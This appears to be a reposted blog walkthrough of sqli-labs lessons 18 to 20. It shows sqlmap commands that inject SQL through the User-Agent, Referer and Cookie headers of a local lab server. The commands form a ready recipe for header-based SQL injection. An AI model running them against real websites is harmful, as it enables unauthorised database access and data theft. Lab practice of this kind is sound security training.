zoukankan      html  css  js  c++  java
  • sql-labs 18-20(sqlmap注入)

    这三题主要是关于HTTP头部的注入

    常见的HTTP注入点产生位置为

    【Referer】、【X-Forwarded-For】、【Cookie】、【X-Real-IP】、【Accept-Language】、【Authorization】

    Less18:报错型,单引号,user-agent型注入点

    由于这一题时关于user-agent的注入

    两种sqlmap注入方式

    python sqlmap.py -r 1.txt --dbs --threads 8 --technique BTES
    python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-18/" --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0*" --level 4 --dbs --threads 10 --technique BEST

    第一种方式是将HTTP请求包的内容放在一个txt文件里面,cookie可以不用放,然后-r跟上txt文件的路径,让sqlmap自动跑,这里要注意user-agent值后面要跟上”*“符号

    第二种方式就在语句中直接跟上存在注入点的http请求头参数的值,同样,注入点处还是得跟上”*”符号

    -r: sqlmap可以从一个文本文件中获取HTTP请求,这样就可以跳过设置一些其他参数(比如cookie,POST数据,等等)
    --user-agent http头会携带一个值,就是user-agent,表示访问的浏览器的信息
    sqlmap 检查uesr-agent中的注入点, 
    lever>=3才会去检查user-agent头是否存在注入漏洞

    Less19:单引号,referer型注入点

    跟十八关差不多,只是存在注入点的HTTP请求头参数不一样,这里是referer处存在注入点

    同样用两种方式:

    注意注入点处要跟上“*”符号

    python sqlmap.py -r 1.txt --dbs --threads 8 --technique BEST
    python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-19/" --referer=" http://127.0.0.1/sqli-labs-master/Less-19/*" --level 4 --dbs --threads 8 --technique BEST

    Less20:单引号,cookie型注入

    http头部cookie处存在注入点,用cookie注入的sqlmap语句

    python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-20/" --cookie="48zL_2132_ulastactivity=fbcd4XN6yzDIyGYPfy3uCZanmWgjMX0XMh%2Bk8uqR1UGkGf9RpEIe; 48zL_2132_lastcheckfeed=3%7C1556519884; __guid=96992031.3043186743165115400.1567255498313.9548; monitor_count=49" --level 3 --dbs
    --cookie
    
    web应用基于cookie的身份验证,对于post请求,可以指定cookie
    
    sqlmap -u "url" --cookie="..." --level 3 –-dbs
  • 相关阅读:
    基于C++ Qt实现的红色警戒3修改器
    Java多线程(十五):CountDownLatch,Semaphore,Exchanger,CyclicBarrier,Callable和Future
    Java多线程(十四):Timer
    Java多线程(十三):线程池
    Java多线程(十二):中断机制
    Java多线程(十一):线程组
    Java多线程(十):BlockingQueue实现生产者消费者模型
    德国语言+留学签证递交材料详解(上海)
    Java多线程(九):生产者消费者模型
    Java多线程(八):ReentrantReadWriteLock
  • 原文地址:https://www.cnblogs.com/-chenxs/p/11611091.html
Copyright © 2011-2022 走看看